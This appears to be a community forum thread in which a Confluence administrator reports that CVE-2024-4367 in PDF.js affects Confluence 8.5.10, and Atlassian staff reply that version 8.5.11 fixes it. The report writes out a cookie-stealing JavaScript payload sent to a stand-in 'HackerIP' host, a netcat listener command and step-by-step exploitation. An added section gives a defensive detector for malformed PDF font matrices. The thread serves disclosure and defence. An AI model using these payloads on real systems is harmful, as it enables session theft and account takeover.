[SEC] Confluence CVE-2024-4367 security issue

Yong Xin Choon October 8, 2024

We found CVE-2024-4367 in Confluence version 8.5.10 and did not find an official way to deal with this vulnerability. How can we make an effective fix?

Vulnerability Overview

In Confluence version 8.5.10, PDF.JS is referenced for loading and parsing PDF files. However, a previous vulnerability, CVE-2024-4367, exists in the PDF.JS plugin, affecting versions <= 4.1.392. It was discovered through testing that the version of PDF.JS used in Confluence 8.5.10 is also affected by this vulnerability.
An attacker can exploit this vulnerability by uploading a malicious PDF file. When the victim previews or opens this file, the malicious JavaScript code is automatically executed, leading to remote code execution (RCE) or theft of the victim's cookies. This could further allow the attacker to take control of the victim's system, steal sensitive information, bypass authentication mechanisms, and directly access the victim's account.
Reference links for CVE-2024-4367:
Since I could not find information about this vulnerability on your official website, https://www.atlassian.com/trust/data-protection/vulnerabilities, I attempted to disable the preview function in the background as an administrator but failed.
Following a solution from your official forum, modifying specific database table fields to disable the preview function is practically unfeasible.
I hope you can assist me in resolving this issue.

Vulnerability Steps

Using the tool https://github.com/LOURC0D3/CVE-2024-4367-PoC, I constructed a malicious PDF file that, when parsed by PDF.JS, automatically sends the victim's cookies to the attacker's server.

Attack Command

The following Python script is used to construct the malicious PDF file (I use this command to steal users' cookies):
Python: 

CVE-2024-4367.py "var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://HackerIP:2024/?cookie=' + document.cookie, true); xhr.withCredentials = true; xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { console.log(xhr.responseText); } }; xhr.send();"

------

Steps to Exploit the Vulnerability

  1. Create a Page: Create a blank page in Confluence.
  2. Insert Malicious PDF: Insert the generated malicious PDF file into the page.
  3. Victim Previews the File: When the victim opens or previews the malicious PDF file, the malicious code is triggered.
  4. Attacker Listens on Port: The attacker uses the following command to listen on the server port to capture the cookies: nc -lvp 2024
  5. Capture Victim's Cookies: The attacker receives the victim's cookies on the server.
  6. Use Cookies: The attacker can use the stolen cookies to log into the victim's account without entering a username and password, leading to identity theft and sensitive data leakage. Since the page can be shared, any user can access the PDF, allowing us to steal cookies from any user.
  7. Remote Code Execution (RCE): By further exploiting this vulnerability, the attacker can achieve remote code execution, leading to more severe system damage.

Conclusion

This vulnerability can lead to serious consequences, including remote code execution, data theft, and identity theft.
How can this issue be addressed effectively?
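A defender-side triage check, added here and not part of the thread or of any Atlassian tooling: it flags PDF attachments whose embedded font program carries a malformed /FontMatrix (anything other than six plain numbers), the structure that PDF.js builds up to 4.1.392 evaluated as script in CVE-2024-4367. It assumes font streams are either stored plainly or Flate-encoded; the function names and the two sample font headers are constructed for this example.

```python
"""Added example: flag PDFs whose embedded font program carries a
non-numeric /FontMatrix, the malformed structure behind CVE-2024-4367
in PDF.js <= 4.1.392. Useful as an upload gate or to triage existing
attachments while the upgrade to a fixed Confluence is planned."""
import re
import zlib

# A Type1 /FontMatrix must be exactly six numbers; anything else is suspicious.
_FONTMATRIX = re.compile(rb"/FontMatrix\s*\[([^\]]*)\]")
_NUMBER = re.compile(rb"^[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$")
_STREAM = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def _views(data: bytes):
    """Yield the raw bytes plus every stream body that inflates cleanly (assumed FlateDecode)."""
    yield data
    for m in _STREAM.finditer(data):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            continue  # not Flate-encoded; the raw view already covers it


def suspicious_font_matrices(data: bytes) -> list:
    """Return the body of every /FontMatrix that is not six plain numbers."""
    hits = []
    for view in _views(data):
        for m in _FONTMATRIX.finditer(view):
            body = m.group(1)
            tokens = body.split()
            if len(tokens) == 6 and all(_NUMBER.match(t) for t in tokens):
                continue
            hits.append(body.decode("latin-1").strip())
    return hits


def is_suspicious(data: bytes) -> bool:
    """True when the PDF (or font file) should be quarantined for manual review."""
    return bool(suspicious_font_matrices(data))


def flate_stream(payload: bytes) -> bytes:
    """Wrap bytes as a Flate-encoded PDF stream object (constructed helper for testing)."""
    body = zlib.compress(payload)
    return b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(body) + body + b"\nendstream"


# Constructed samples: a well-formed Type1 header, and one whose matrix
# carries a parenthesised string token where a number belongs.
BENIGN = b"%!PS-AdobeFont-1.0\n/FontMatrix [0.001 0 0 0.001 0 0] readonly def\n"
MALFORMED = b"%!PS-AdobeFont-1.0\n/FontMatrix [1 0 0 1 0 (x)] readonly def\n"
```

Run it against real attachments with `is_suspicious(open(path, "rb").read())`; a hit means the file needs review, not that it is confirmed malicious.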

Answer accepted
Saurabh Bhatia
Atlassian Team
October 8, 2024

Hi Yong,

Thank you for reaching out. We can confirm that this vulnerability has been fixed in Confluence version 8.5.11. So, you can plan to upgrade Confluence and see if you are able to reproduce this behaviour by any chance.

In the context of why this is not populating under our Vulnerability Portal, we have initiated a discussion internally to fix this part.

Hope this information helps.

Thanks

Yong Xin Choon October 8, 2024

Thanks Saurabh!
